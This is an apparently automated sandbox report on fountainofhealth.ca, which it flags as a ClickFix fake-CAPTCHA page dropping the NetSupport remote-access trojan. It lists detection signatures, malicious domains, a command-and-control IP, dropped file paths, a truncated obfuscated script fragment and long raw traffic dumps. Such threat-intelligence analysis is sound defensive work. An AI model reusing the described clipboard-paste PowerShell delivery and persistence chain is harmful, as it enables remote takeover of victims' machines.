Windows Analysis Report
http://fountainofhealth.ca

General Information

Sample URL: http://fountainofhealth.ca
Analysis ID: 1696974
Infos: yarasigma

Detection

NetSupport RAT, CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
HTML page adds supicious text to clipboard
HTML page contains obfuscated javascript
Installs a global event hook (focus changed)
Installs a global keyboard hook
Obfuscated command line found
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Uses threadpools to delay analysis
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://lang3666.top/lv/xfa.js Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Options\client32.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe ReversingLabs: Detection: 16%
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary, 37_2_110AD570

Phishing
barindex
Yara detected CAPTCHA Scam ClickFix
Source: Yara match File source: 0.2.pages.csv, type: HTML
HTML page contains obfuscated javascript
Source: https://islonline.org/d.js HTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _
Source: https://fountainofhealth.ca/en HTTP Parser: No favicon
Source: https://fountainofhealth.ca/en HTTP Parser: No favicon
Source: https://fountainofhealth.ca/en HTTP Parser: No favicon
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Options\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.17:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.140.48.131:443 -> 192.168.2.17:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.3.254:443 -> 192.168.2.17:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.113.155.207:443 -> 192.168.2.17:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.111.208.110:443 -> 192.168.2.17:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.206.121.228:443 -> 192.168.2.17:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.204.88.70:443 -> 192.168.2.17:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.17:49804 version: TLS 1.2
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF100000.00000004.00000800.00020000.00000000.sdmp, client32.exe
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb7 source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 37_2_1102D330
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 37_2_11065890
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 37_2_1106A0A0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 37_2_111266E0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 37_2_1110AFD0
Source: chrome.exe Memory has grown: Private usage: 18MB later: 61MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2061385 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (islonline .org) : 192.168.2.17:61783 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061385 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (islonline .org) : 192.168.2.17:55881 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061388 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (islonline .org) : 192.168.2.17:49733 -> 23.23.49.179:443
Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.17:49796 -> 94.158.245.131:443
Source: Network traffic Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.17:49796 -> 94.158.245.131:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=k&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=c16bccd06c08419ab579eb9d479800f7 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-s
Source: global traffic HTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ke&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=765b10655e7e40cbb2ceb3b8d696ff0e HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-
Source: global traffic HTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=key&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=e536722ae7aa4c4fabfce29204700ecd HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
Source: global traffic HTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
Source: global traffic HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
Source: global traffic HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=65dc22f5bae44905b431c10cc183a3ed HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
